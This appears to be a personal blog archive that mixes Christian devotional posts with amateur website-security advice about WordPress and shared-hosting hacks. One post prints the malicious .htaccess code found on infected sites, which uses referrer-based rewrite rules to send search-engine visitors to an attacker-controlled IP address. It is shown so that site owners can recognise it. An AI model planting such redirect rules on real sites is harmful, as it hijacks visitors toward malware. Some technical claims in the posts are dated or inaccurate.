Category Archives: Random Holy

The Beauty of a Woman, Lover of God

Beauty of woman lover of God Runholy.com

The Beauty of a Woman, Lover of God

Beauty of woman lover of God Runholy.com

The beauty of a woman who is a lover of God is always growing

Not only because she will be pursuing fitness of her soul, mind, AND body

But because she will radiate joy, kindness.

When you think of her, you will feel warm.

Her remembrance will make you smile.

And her memorial will be all the beauty her life brought to the world & the glory she brought to God.

In her presence will be peace and she will bring peace to your heart.

As age spots her skin God’s spirit is removing all blemishes from her soul.

As the color fades from her hair, her life influence will become rich and vibrant.

Her remembrance will make you smile.

And her memorial will be all the beauty her life brought to the world & the glory she brought to God.

Through her selflessness, humility, and love.

 

Grace & peace,

 

Lauren

Ultimate Blog Party 2013 – Lauren with RunHoly

Ultimate Blog Party 2013

Ultimate Blog Party 2013

I’m creating this post for the Ultimate Blog Party 2013. Hi! Welcome!  My name is Lauren, and this is my blog is RunHoly.com.  I’ve had this blog for almost 10 years.  You can look over it and see this journey of life.  Things change so much!  Right now? I’m a Christian wife and mom.  I write about the challenges of life along with fitness, nutrition, current events, bible study, and just application to faith and theology in my daily life.  Recently, I’ve been focusing on fast recipes, losing postpartum weight, study of Grace, and our “alone” walk with God.  I would love to link up with friends that have similar interests (or very different!).

Here is my facebook page

And my twitter

And Instagram

HtAccess Hacks – Redirects to Malicious Site

The reason this type of hack occurs:
This can happen for various reasons like:

– poor/compromised account/FTP password, which allows hackers to guess the password [or use brutforce tools] and get unauthorized access.
– user’s computer infected by viruses, which is controlled by hackers. In this situation, customer’s uploads also get infected.
– poor scripts, which allows hackers to insert various malformed queries and remotely execute the code and perform intended action
– Virus effected theme selection for the application
– Installing application which are downloaded form third party sites; mainly not genuine sites.

You will have to ensure that:

– generate a strong password combination [for account, ftp, database etc]
– scan local computer with good antivirus, anti spy ware programs and clean bad programs.
– keep the software up-to-date with vendors/developers, and seek their support/forums for any known vulnerabilities/fixes/workarounds available.

Host dealing with this issue:
hostmonster
ipower
unknown/
unknown2
ipower2
ixwebhosting

information on having your page delisted from Google as a malicious site.

Another site that will help you get de-listed from Google.

What the Code looks Like in the Htaccess File:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://89.28.13.200/join.html?s=join [R,L]

Other Good Links on this Type of Hack:
#1
#2

More on WordPress Hacks

I came across this interesting article today that discusses how hackers exploit scripting vulnerabilities in software such as wordpress.

Remember that the only way we are going to fight these persistent hackers is to take the offense and educate ourselves on proper methods of increasing site security and protection.

Here are Seven Ways to Protect Your Site:

Seven Ways to Protect Your Website From Hackers

Those of us who are hackers would be offended by the article’s title. Hackers are ethical testers to find faults in systems so they can be corrected before unethical hackers (crackers) exploit them. So, this articles is really about how to protect your website from crackers.

Keep your files up to date.

Signing up for updates for scripts (programs) your site uses will let you know if there are any. You should use the latest update to protect yourself. This is often the reason the update is released. If you are unsure of the scripts used on your website, contact your web developer.

Remove unnecessary files. As your website changes, old files are ignored. They should be removed. Keep copies offline in case you wish to add them again, but remember to update any scripts. Old files are often indexed by search engines. So even if you do not link to those pages anymore, the search engines lists them for Internet users to find and visit. Automated programs to search for these files can find them to exploit them.

Implement passwords. Any sensitive files, databases or scripts should be protected. Please use passwords that are difficult to guess. Use letters AND numbers, and characters.

Include robots.txt. Create a file to tell search engines not to index files that are restricted to certain users.

Check permissions of uploaded files. Check with your web host if you are unsure.

Protect email addresses. If you ever got a strange email that tested your form or simply sent you an email to yourself, one of those spammer programs found your email address from your website or someone else’s. There are scripts to split up your email address, so spammer software programs cannot read them. Another way is to place your email address in an image or simply have an “Email us” link. I haven’t done this, but I didn’t have any problems until recently. I still want to make my contact information visible to my target audience.

If you sign guestbooks, go to forums or newsgroups, or share your email address with anyone else, your email address can be posted and shared all over the Internet. I often use several email addresses when making posts, because spammers look there first for email addresses. To spammers, a guestbook is an email address database. So use a Hotmail account for your email, but you can still include your web address in your signature. If the Internet user visits your site, the user can contact you using the link on your site. The spammers probably won’t visit your site, so the spam goes to the posted email address.

Protect your source code. Some people use that stupid right-click script to protect their source code. Not only does that not protect your code, you are disabling browser functions such as adding your site to their favorites or printing. Though many people have “borrowed” my source code, I would not want to disable functions that my target audience wants to use. There are scripts to make your source code hidden. This is more effective, but a pain for anyone who wants to edit your site. The preferred method is external files such as external style sheets or javascript files.

Include copyright information on the page and in the meta tags for every web page. Watermark all images. Keep copies of previous versions of your site with the last modified information intact. Save files on disks, so they can be retrieved. if necessary. Visit the WayBack Machine to find previous versions of websites, if you cannot find your files. Though the information is incomplete, it is better than nothing. Buy the copyrights to important files to protect yourself from competitors or other parties.

"The Web Is Under Attack"

No one really knows when the mob of mass hacking attacks were unleashed on the web, but many would guess it was the day that “Google Tips” appeared on the home page of your trusted Google.com.
. Some also say that the hacks began on chinese language websites back in May 2007 through sql injection and this same type of malware infection of users pc’s stealing passwords and other sensitive information.

This started a mass of personal computers thereby sites being compromised. Malware/Trojans were downloaded and spread like a terrible virus using htaccess files and javascript injections. If this malware has infected your pc, there are easy instructions for removal. Although, this may have been the starting point, the mass attacks of hacks didn’t stop there.

On May 13th, 2008, over 500,000 websites were reported hacked through poorly configured php bulletin boards and other similar softwares. You can no longer be safe by steering clear of pornographic and questionable sites. Even government, edu, large sites like Wal-Mart, and even Homeland Security have been hit with these types of attacks. The attacks didn’t start hitting casual sites like yours and mine until about October 2007.

This evolution in tactics by black hat hackers means that miscreants are able to quickly ‘colonize’ thousands of legitimate sites with malware. ScanSafe reports a 220 per cent increase in the amount of Web-based malware over the last twelve months. The volume of backdoor and password-stealing malware blocked by the firm increased by an order of magnitude (855 per cent) between May 2007 to May 2008.

Scansafe has gone on the record stating that “The web is under attack”

“Over the last year malware authors have moved away from direct attacks — attacks in which they directly interact with victims, via social engineering for example — to indirect attacks accomplished through compromised websites,” said Mary Landesman, senior security researcher at ScanSafe.

“Currently, thousands of legitimate sites are being compromised daily.”
If you do a simple google search for “shared web host name (i.e. godaddy, bluehost, dreamhost, ixwebhosting)” and the word “hacks” or “hacked”, it will report hundreds of thousands of listings.
Results 1 – 10 of about 493,000 for go daddy hacks
Results 1 – 10 of about 372,000 for blue host hacks
Results 1 – 10 of about 220,000 for dreamhost hack
Results 1 – 10 of about 40,400 for hostgator hack
Results 1 – 10 of about 39,200 for lunarpages hack
Results 1 – 10 of about 25,200 for ixwebhosting hack

So what can we do about this?”

As website owners, the best option would be to move our sites away from shared hosting. But who can pay $150 a month for a simple blog site? Not me. The fact is that on a shared server, there will be Mom & Pop stores, sites, blogs, etc that have outdated versions of software that contain vulnerabilities and easily exploited holes. New versions of software come out very often that contain patches to fix vulnerabilities in response to hackers exploiting them. The first step that you can take is to always update your software. The hackers are going to be offensive. With the web “under attack”, it’s not a time to play defense. You have to seek out if new updates are available. WordPress has a plugin that will check for updates and install them for you. There may be other plugins like this for many of the software that hackers try to exploit everyday. This is a very well-written post on securing your WordPress site:
http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
Also, here is a link on an easy way to upgrade WordPress I have composed a list below of commonly hacked software that you will need to keep updated:

Forum Software: PhpBB, etc (phpBB2 especially. If you are still using this, STOP immediately, and update to phpBB3)
Content Management System Software (E107, Joomla, etc)
Joomla –check for updates OFTEN. This software has new holes every minute)
All Shopping Cart Software (Zencart, OSCommerce, etc)
Blog Software (WordPress, B2Evolution, etc)
Gallery Software (Coppermine, Gallery2)

Also, do not keep software install folders on the server. And if there is any software that you have tried out and left on the server, delete it. Only if you are using it, maintaining it, and updating it should you leave it on the server.

If you have had programmers working on your site, here is a list of the top 25 most common coding errors that create vulnerabilities that hackers can and will take advantage. “Organized crime groups have turned their attention to computer-based crimes and are increasingly attacking weaknesses in applications,” (source). Phishing attacks or cross-site scripting is another type of attack that will cause more than you problems.

So, check your folder permissions and files often. You can use a program like FileZilla to change all of your permissions to 755 or 715, recursively. There should never be a file or folder that has “Group” or “Other” write permissions assigned to it.

The number 1 offensive measure that you can take as a website owner or webmaster is to ensure that your sites are hosted on a server running php5. Articles on php4 vs php5 (1 & 2). Unless your host is at least using php v 4.4.92, you will continue to get hacked over and over again if you even have on vulnerability because of the way that php runs in version 4. PHP version 5 runs php as cgi instead of as the user. This will protect your other domains from being infected because of another domain under your same user. If you are still on PHP4, ask your host how to move to PHP5. Although this can be a huge hassle, it will be worth it in the end.

Do your part on the shared server that you are on, and if you have the money, move to a dedicated host or a VPS. You might even consider moving to a windows server where users will have less access to make changes to permissions and software…as long as the iis/windows server is running PHP version 5 or newer.

No one likes to be hacked, but web site owners are slowly learning over the past year or so that it is a part of life. Technology will adapt as it always does, and the hacks will dwindle. Until then, bots and scripts are scanning the web searching for sites with vulnerabilities that can be compromised, take the offensive steps to ensure that your site is not one of them.

Pesky Extra Space

I had this problem this morning. My other blog, AtLastMyLove was giving me an error whenever I tried to pull up the domain with the. It also gave me an error whenever I tried to go to the admin portion of the site. This was the error:

Warning: Cannot modify header information – headers already sent by… in wp-includes/pluggable.php on line XXX .

I did all but completely delete my website and start from scratch. I was really at my wits end. I was even going to switch my web hosting over to windows web hosting. (Seeing as how this had all started with my domain being hacked with javascript injection.). Through my webhosting control panel, I completely deleted wordpress, uploaded the newest version, replaced the contents folder. The only file that was not being changed was the wp-config file, since that had all my connection data. So, I assumed that this had to be the file with the problem. I kept reading on web hosting and wordpress forums that this error was caused by space in your code. Line by line I took out the extra space between every line of the configuration file. I was at my wits end when hours after this had all started, I pulled the config file into a text editor.

There after the closing tag of php blinked my cursor… exactly one space after the closing tag. I took out that one space and uploaded the file. Immediately everything began working. It’s amazing how one little space can make all the difference. 🙂

So, I guess I can keep my account hosted on the linux web hosting account for now. It’s kind of ironic- I work at a web host, and I spent three hours picking apart the code of my site for one pesky space.

Internet Gone Hack-Crazy

Some new hacks are running rampant on the web, and they are making my life very difficult along with all the other web site owners that have been affected (or infected). I just don’t understand the allure of hacking servers and sites.

Hack #1: Javascript injection

This one seems to happen more if you are using a CMS (like Joomla), Blogging Software (like WordPress), or an older version of php (version4). In this hack, the hackers inject javascript on all index pages that looks like a yahoo counter. What this code is actually doing is interacting with a generated random letter folder that will look something like this: domain.com/xjklu . This folder will have mixtures of httpd ownership and root ownership. If you do not have shell access, you will need to contact your hosting provider to have the ownership changed back to your username. If you have any other questions about this, leave me a comment.

Hack #2: Htaccess hack

In this hack, the hackers are creating a .htaccess file that is causing your site to redirect to a fake Anti-virus site (AV2009). This .htaccess file will be 414 bytes in size. This all originated when some of google’s servers were hacked with this same htaccess hack. Then when people clicked on google search links, they were redirected to a fake anti-virus download link.

You will need to remove this file then go to this site for the steps to remove this virus from your pc: http://www.xp-vista.com/spyware-removal/antivirus2009-antivirus-2009-removal-instructions . After you have followed those steps, change your ftp password to ensure that those hackers no longer have access to your ftp password. Again, if you have any questions about this, leave a comment.